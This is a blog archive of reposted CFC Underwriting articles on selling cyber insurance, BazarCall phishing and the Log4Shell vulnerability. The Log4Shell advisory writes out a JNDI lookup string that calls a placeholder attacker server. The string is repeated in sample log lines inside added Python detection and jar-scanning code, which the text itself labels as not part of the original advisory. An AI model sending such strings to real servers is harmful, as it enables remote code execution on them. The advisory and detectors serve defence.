
Category Archives: Cyber Risk Management

Six Things Successful Cyber Brokers Know

The case for cyber insurance gets stronger by the day, as cyber incidents grow in cost, cyber attacks become more frequent and cyber policies offer more innovative and effective services. But cyber is still a new market. Businesses often aren’t aware of their cyber risk or the role cyber insurance can play in protecting them. So how can you educate your customers about cyber?

CFC sat down with some of their top-performing cyber brokers to discover their secrets to success. Here are six things they say every broker selling cyber should know:

  1. How to explain cyber exposure simply

    Since lots of businesses are new to cyber, jumping straight into granular detail can feel unrelatable and unconvincing. Businesses don’t need to know the difference between the Cobalt Strike infection and the Log4Shell vulnerability. They care about how they’re at risk, the potential consequences of that risk and how they can prevent it. So stick to the basics and avoid unnecessary jargon.

    It helps to ask the right questions. What cyber security practices do you have in place? Do you consider data privacy? Have you been impacted by a cyber attack before? Your client’s answers will paint a picture of their cyber exposure, so they can understand their risk and how cyber insurance is here to help.

    And there’s nothing better than a strong statistic to back up your points—did you know 72% of businesses worldwide have been impacted by ransomware in 2023?

  2. Key factors that influence the price

    Cyber insurance provides great value for businesses big and small, but in many circles its cost is a topic of discussion. Those new to cyber may point to the price of cyber insurance coming close to more traditional lines, so it helps to know the three big factors that influence the cost:

    1. Cyber incidents, particularly against SMBs, are the top business risk for the fifth year running
    2. The average cost of a cyber claim is significant
    3. Today’s cyber policies offer sophisticated technical services that would be too pricey for SMBs to get on their own

    Learn more about why cyber insurance is a great investment for any business, plus a breakdown of cyber incident costs, in this quick read.

  3. How to handle these top objections

    “I already invest in cyber security.”
    Cyber insurance provides a different service from cyber security; it’s not a question of either/or. Good policies will support the business’s internal IT team or external managed service provider with an expert incident response and business recovery team, while being there to cover financial loss if the worst happens.

    “Cyber attacks only affect big businesses.”
    While it’s attacks on household names that make the news, any business can find itself hit by a cybercriminal. And since smaller businesses tend to have less mature cyber security practices in place, cybercriminals often see them as the more attractive target.

    “We don’t collect sensitive data.”
    Two of the most common and costly cyber attacks we see are actually ransomware and funds transfer fraud, which aren’t necessarily aimed at stealing data. The cost to contain threats, repair networks and restore business operations—or to recover stolen funds—is the insured’s biggest worry. Thankfully, both types of incident are covered under CFC’s cyber policy.

    Use this checklist to find answers for more common objections.

  4. Security assessments don’t tell the full story

    Businesses often use third-party risk reports and vulnerability scans to evaluate their cyber risk. While these assessments give a good snapshot of network health at a specific time, IT environments can change any day. This means assessments don’t reveal much about the ongoing level of security across a network, and can present a far more positive picture than is actually the case.

    Fully understanding when and how risk reports are beneficial will help your clients understand their risk and purchase the correct coverage. We explain risk reports in more depth here.

  5. Good policies offer proactive and reactive services

    Cyber insurance doesn’t just cover financial loss when an incident occurs. A good policy offers proactive protection to stop attacks from happening in the first place, and reactive support to respond to the incident efficiently and effectively.

    From the moment a CFC cyber policy is bound, their global team of cyber experts works around the clock to detect and alert their customers to cyber threats targeting their business. If they discover a cyber security issue, their team notifies the impacted business through their Response app, and takes steps to remediate the threat before it escalates.

    The value these services offer to small businesses in particular might just be the greatest benefit a cyber policy can provide.

  6. The perfect analogy that shows the true value of cyber

    Taking out property insurance in case of a fire is seen as standard practice. Alarms and sprinklers can reduce fire damage, but they can’t remove the possibility of you facing a costly bill and business interruption. It’s the same principle for cyber.

    The most advanced cyber security available can still get caught out by a new vulnerability or threat. Without cover, the impacted business won’t receive support in their incident response and recovery, and it’ll bear the financial burden alone.

    CFC’s cyber policy is the full package. For a smoke alarm they offer proactive cyber attack prevention, for a sprinkler system the largest in-house team of incident responders in market. And at the end they cover any damage and loss of income, helping policyholders get back on their feet.

With today’s cyber policies broadening their cover and protection, and cyber risk escalating at an alarming rate, cyber insurance is set to play a bigger role than ever before. By helping your clients to understand their cyber risk, and how cyber insurance is such a gamechanger, you and CFC can help protect businesses and perhaps even turn the tide on cybercrime.

See how you can best speak to your clients about cyber risk and insurance in CFC’s on-demand webinar.

Source: www.cfcunderwriting.com


Does Cyber Insurance Cost Too Much?

We often hear that cost can make cyber insurance a non-starter for businesses. We get it; broad coverage comes at a price given the value of services provided with a policy these days.

So, CFC has listed below the 5 key reasons a cyber insurance policy is worth the financial investment.

Cyber is a business’ largest exposure
We’re in a digital age and businesses no longer rely on paper trails and filing cabinets. This digital reliance has shifted a business’ assets from tangible to intangible, making them wildly accessible and opening even the smallest of businesses to a whole new era of risk.

Consequently, most companies today state that cyber risk is in their top three, if not their number one, business risk given their reliance on technology. Since the frequency of loss is that much greater for a cyber event than for traditional perils such as fire, it makes sense that the cost of cyber insurance today mirrors a business’ largest exposure.

CFC has created a cyber risk heat map, which explains the varying levels by industry. Hint, nearly no business is safe!

Premiums are a fraction of the cost compared to a cyber claim
The price of cyber insurance may seem higher than expected given many still consider it a discretionary purchase, but when you compare the thousands, hundreds of thousands, or even millions in costs that cyberattacks can incur for business, it’s an easy decision to make.

And the severity of those claims continues to rise. According to the latest Coveware report, fewer victims are paying ransomware demands, so threat actors are demanding more money to compensate for the lower hit rate, making individual claims more expensive.

This lower hit rate on ransomware has also meant hackers are pivoting back to previous attack techniques, with the likes of business email compromise attacks showing an increase of 147% across the second half of 2022 (for SME businesses).

A good cyber policy should offer proactive protection from attacks
At CFC, from the minute the policy is bound, their cyber security team works around the clock to protect businesses against cyber-attacks.

This is a proactive, protective service that identifies potential threats using insights from a variety of sources, including public and private threat intelligence feeds that go well beyond the usual outside-in scanning tools available to insurers. If a cyber security issue is found, their team will reach out through their Response app to work with a potentially compromised business, to eliminate the threat before it can cause harm.

To pay for this level of monitoring externally, a business would need multiple providers, each costing upwards of thousands every year. All of this work is included at no extra cost as part of the standalone CFC cyber policy, alongside expert incident response and recovery.

Expert incident response and recovery
One of the other critical elements of a cyber policy is the availability of in-house cyber incident response. At CFC, their team of cyber threat analysts, digital forensic specialists and incident responders, CFC Response, is available 24/7 to triage incidents, contain threats, and repair networks if a cyber incident occurs.

Cyber policies cover a lot
A good, stand-alone cyber policy, such as a CFC cyber policy, includes comprehensive coverage.

Many small businesses do not have access to enterprise-grade security teams, threat intelligence feeds that can inform them of whether they are listed on a threat actor’s target list, or access to a multi-disciplinary team of experts who know how to respond to cyber-attacks and complement existing IT personnel.

Equally, should the worst happen, cyber insurance policies cover everything from cyber incident response costs, including IT forensics, legal, breach notification and crisis communications, to cybercrime costs that include social engineering, theft of personal funds and cyber extortion.

All told, this can cost anywhere from thousands to hundreds of thousands, and there is no limit to the range of support required during a cyber incident. CFC’s security team estimates that the average downtime following a ransomware attack can be up to 2-3 weeks, and that’s only with the expert assistance of a cyber incident response team provided by an insurer. With a broad policy, the insured can focus on getting their business back up and running, rather than worrying about what will and won’t be covered by their insurer.

It is estimated that cyber-attacks will cost the globe $8 trillion in 2023. Yet, we estimate, fewer than 20% of businesses have taken out a cyber insurance policy as of today. Cyber insurers are not just there to step in after an attack has taken place, ready to pay the many external teams a business needed to pull in to recover. Instead, coverage from a cyber insurer like CFC protects and prevents attacks on businesses from the minute they bind a policy.

Cyber insurance is not expensive, cyberattacks are. And with the right cyber insurance product, it should be the easiest purchase a business has ever made to cover its largest exposure.

Source: www.cfcunderwriting.com


Beware of “BazarCall” Ransomware Attack Method

The new attack method has been growing in use among well-known ransomware groups and was responsible for 10% of malware incidents last quarter.

What is it?

BazarCall is a new attack methodology, known as a T.O.A.D (telephone-oriented attack delivery), which utilizes a phishing email to trick the victim into phoning a call centre – rather than clicking a link – and instructs them to download a malicious file which infects their computer. By doing so, the BazarCall attack subverts common cyber security controls and allows the hacker to carry out a ransomware attack undetected.

The phishing emails usually refer to a subscription, for instance an antivirus software, which the victim never requested. The phishing email falsely claims that the only way to cancel this fake subscription is to phone the call centre.

From there, the hacker verbally guides the victim through the process of downloading a malicious Excel file with macros and then enabling those macros, which in turn infects the computer with malware.

Why is it critical?

Because the BazarCall method doesn’t require the user to click a link (as you would expect in a normal phishing email) common cyber security tools like email security filters can’t detect it. The method also subverts security controls because the user is downloading the malware themselves, unlike some more typical cyber attacks where the hacker must first penetrate the network.

Workplace security awareness education about phishing emails and social engineering doesn’t often include warnings for telephone-oriented attacks, which makes this attack more lucrative for hackers and more challenging for businesses.

What has CFC seen?

In early 2022, CFC’s cyber threat analysis team, which is responsible for analyzing and responding to cyber threats on behalf of CFC’s cyber insurance clients, first observed an increase in adoption of this technique by a variety of well-known ransomware groups.

In response, CFC analyzed its cyber customer base and found that BazarCall accounted for 10% of successful malware infections detected across its cyber portfolio in the last three months.

However, by intervening quickly, to date CFC has detected and removed every case of this malware within its impacted customers, at no cost to them. This intervention can happen at three stages:

  • When a specific victim has received the phishing email but not yet called the phone number
  • When they’ve called the phone number within the email
  • When they’ve installed the malware

How to mitigate

In order to protect your business from such attacks it’s important you’re implementing the following:

  • Keep all software and firmware up to date: Every device needs antivirus software. If an employee downloads a malicious application like the one from BazarCall, or if an application becomes infected, antivirus software along with modern, up-to-date firewalls will help to secure the device and remove the infection.
  • Implement multi-factor authentication (MFA) on all remote connections: MFA can help reduce the amount of lateral movement and privilege escalation hackers can achieve within your systems. Even if your password is in the hands of the criminal, it is unlikely they will have your other forms of verification too. For more on MFA best practices, read our cyber tips piece on multi-factor authentication.
  • Employee security awareness training: The majority of cyber attacks are the result of human error, particularly employees who inadvertently click on malicious links or fall victim to social engineering attacks like BazarCall. Carry out regular security awareness training with your employees and ensure it covers all types of social engineering attacks.

For other ways to keep your employees safe read our article, Staying Safe Online.

Source: www.cfcunderwriting.com


Cyber Trends Predicted for 2022

2021 was certainly a time of change for the cyber insurance market and it’s looking like 2022 will be no different.

The cyber threat landscape over the last year has proven to be the most volatile yet in the history of the market, for the simple reason that the risk is too low and the profitability too high for threat actors. As a result, cyber insurers have had to evolve just as quickly to prevent and respond, leading to the following predictions for the year ahead:

Zero-day ransomware attacks
Zero-day ransomware attacks will dominate the headlines, whereby criminals exploit software vulnerabilities before any patches are available for businesses to apply. This means that the only way to prevent an attack is through improved security controls in advance.

Fear of a systemic risk event
Third party dependencies will continue to be a weak link for cyber risk. Managed service providers and cloud computing providers will continue to be lucrative targets for cybercriminals, with the fear of the next large-scale systemic risk event – where a single event has the potential to impact thousands of businesses – at the forefront of everyone’s mind.

Cyber insurance = risk management service
Cyber insurance will predominantly become a proactive risk management service. Insurers will seek to prevent claims before they happen and will pivot to conducting scans to detect vulnerabilities as an added service through mobile app technology.

Increased regulatory and governmental scrutiny
There will be increased scrutiny by both regulators and government advisory groups, with a focus on improving security standards for businesses to prevent attacks. Equally, government bodies will seek, through legislation, to ensure there is more transparency around when businesses decide to pay ransom demands.

Targeting manufacturers and distributors
Criminals will continue to target businesses in industries where standards for security have historically been weak. Manufacturers and distributors have been particularly impacted in the last year, given their dependencies on automation, robotics and the supply chain as entryways into their networks.

Continual hardening of the market
As a result, the cyber market is expected to continue to harden with more corrective action taken on rates to ensure the coverage can be maintained as broadly as it has been. Cyber will move from ‘hard to sell’ to ‘hard to buy’ based on limited available capacity, and undoubtedly become where a company’s largest exposure now lies.

So, that’s what CFC thinks will be the most prominent trends hitting the cyber insurance market throughout 2022, but what do you think?

 

Source: www.cfcunderwriting.com


Log4Shell Vulnerability

Log4Shell (CVE-2021-44228) is a critical vulnerability that has been actively exploited and scanned for by malicious actors since its discovery at the beginning of December. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

What is Log4j 2?

The Log4Shell vulnerability results from how log messages are handled by the message processor in log4j2, an open-source logging library provided by the Apache Group that is used by numerous projects.

An attacker can send a specially crafted message, which contains a link to a server they control. For example, they may send a message including the string ${jndi:ldap://evil.xa/x}, where ldap://evil.xa is the attacker-controlled server.

The specially crafted message is passed to the log4j library so it can be logged, but in doing so the library queries the malicious server. The malicious server then responds with directory information, along with whatever code the attacker wants to execute on the victim server. Finally, the victim server loads this response and executes the code it contains.
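As an added defensive example (not part of the original advisory), the following Python triages web-server access logs for the lookup string described above: it URL-decodes each line, matches the ${jndi:…} pattern and extracts the callback host so it can be blocked and investigated. The log lines are constructed, and evil.xa is the advisory's own placeholder host rather than a real indicator; real-world payloads are often obfuscated further, so a production rule needs more normalisation than plain URL-decoding.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# A JNDI lookup as it reaches a vulnerable Log4j 2: ${jndi:<scheme>://<host>[:port]/<path>}.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z][a-z0-9+.-]*)\s*:\s*//"
    r"(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def normalise(text: str) -> str:
    """Repeatedly URL-decode so %24%7Bjndi... is seen as ${jndi...; stops once decoding changes nothing."""
    prev = None
    while prev != text:
        prev, text = text, unquote(text)
    return text


def find_jndi_lookup(line: str) -> Optional[Dict[str, str]]:
    """Return scheme/host/port of the first JNDI lookup in a log line, or None if there is none."""
    m = JNDI_RE.search(normalise(line))
    if not m:
        return None
    return {"scheme": m.group("scheme").lower(), "host": m.group("host"), "port": m.group("port") or ""}


def triage(lines: List[str]) -> List[Dict[str, str]]:
    """Scan access-log lines; each hit carries its line number and the callback host to block and investigate."""
    hits: List[Dict[str, str]] = []
    for no, line in enumerate(lines, 1):
        hit = find_jndi_lookup(line)
        if hit:
            hits.append({"line": str(no), **hit})
    return hits


# Constructed sample access-log lines; evil.xa is the placeholder host from the advisory, not a real indicator.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://evil.xa/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fevil.xa%3A1389%2Fx%7D HTTP/1.1" 200 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:14:03:01 +0000] "GET /docs/jndi-howto HTTP/1.1" 200 "-" "Mozilla/5.0"',
]
```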

Some of the products known to use Log4j 2, and therefore affected by this vulnerability, are:

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume
Apache Hadoop
Apache Kafka
Apache Solr
Apache Spark
Apache Struts
Apache Tapestry
Apache Wicket
Elastic Elasticsearch
Elastic Logstash
Ghidra
Grails
Minecraft
Apache Tomcat
Dropwizard
Elastic Kibana
Hibernate
JavaServer Faces
Oracle ATG Web Commerce
Spring Framework

Why is this critical?

The vulnerability itself allows an attacker to load arbitrary – potentially malicious – code into the target server. This code might add a backdoor to a server, cryptojack or even carry out a ransomware attack.

The vulnerability was published earlier in December alongside a working proof-of-concept that would enable malicious actors to exploit it.

How to mitigate?

To mitigate this vulnerability, we recommend installing the latest updates (2.15.0 or later), and the regular and timely updating of any affected third-party software. This should be done on all devices, not only those directly exposed to the internet.

To support the first priority action above, you should also determine whether Log4j is installed elsewhere. Java applications often bundle their dependent libraries within their installation. To find these copies, undertake a file system search for log4j that also looks inside EAR, JAR and WAR files, e.g.:

find / -type f -print0 | xargs -0 -n1 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

dpkg -l | grep log4j

There could be multiple copies of Log4j present and each copy will need to be updated or mitigated.
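An added example (not the advisory's own tooling) that performs the archive search in Python rather than with zipgrep: it opens every JAR/WAR/EAR, recurses into archives nested inside them, reads the log4j-core version from its Maven metadata and flags each copy below the 2.15.0 threshold stated above, so that every embedded copy is accounted for. The sample war it builds is constructed for demonstration; the archive extensions and threshold constant are assumptions you can adjust.

```python
import io
import os
import re
import zipfile
from typing import List, Optional, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"  # Maven metadata in log4j-core jars
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # the class that performs the JNDI lookup
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED_VERSION = (2, 15, 0)  # threshold named in the advisory above; raise it as vendor guidance evolves

def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); a qualifier such as '-beta9' is ignored for the comparison."""
    return tuple(int(n) for n in re.findall(r"\d+", text.split("-")[0]))

def version_from_pom(data: bytes) -> Optional[str]:
    m = re.search(r"^version=(.+)$", data.decode("utf-8", "replace"), re.M)
    return m.group(1).strip() if m else None

def scan_archive(blob: bytes, label: str, findings: List[dict]) -> None:
    """Inspect one archive held in memory and recurse into jars nested inside wars, ears and fat jars."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return  # not a zip container (mis-named or corrupt file): nothing to inspect
    with zf:
        names = zf.namelist()
        version = version_from_pom(zf.read(POM_PROPS)) if POM_PROPS in names else None
        if version is not None or JNDI_CLASS in names:
            findings.append({
                "location": label,
                "version": version,
                # A copy carrying the lookup class but no readable version is flagged until proven otherwise.
                "vulnerable": parse_version(version) < FIXED_VERSION if version else True,
            })
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(name), f"{label}!{name}", findings)

def scan_tree(root: str) -> List[dict]:
    """Walk a directory tree and report every embedded copy of log4j-core, patched or not."""
    findings: List[dict] = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, findings)
    return findings

def build_sample_war() -> bytes:
    """Constructed sample (not a real artefact): a war bundling one unpatched and one patched log4j-core jar."""
    def jar(version: str) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nversion={version}\n")
            z.writestr(JNDI_CLASS, b"")  # empty placeholder standing in for the class file
        return buf.getvalue()
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", jar("2.14.1"))
        z.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", jar("2.15.0"))
    return war.getvalue()
```

Run scan_tree("/") (or a narrower root) on a host to list every finding with its location, version and vulnerable flag; nested locations are joined with "!" so a jar inside a war is reported with its full path.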

If updating Log4j 2 is not feasible, this vulnerability can still be mitigated by setting the system property “log4j2.formatMsgNoLookups” to “true”. This can be done by restarting the Java service with the following JVM argument:

java -Dlog4j2.formatMsgNoLookups=true …

or you can set an Environment Variable for the JVM arguments:

JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true

Please contact your IT department with any questions on updates needed.

Source: www.cfcunderwriting.com

 

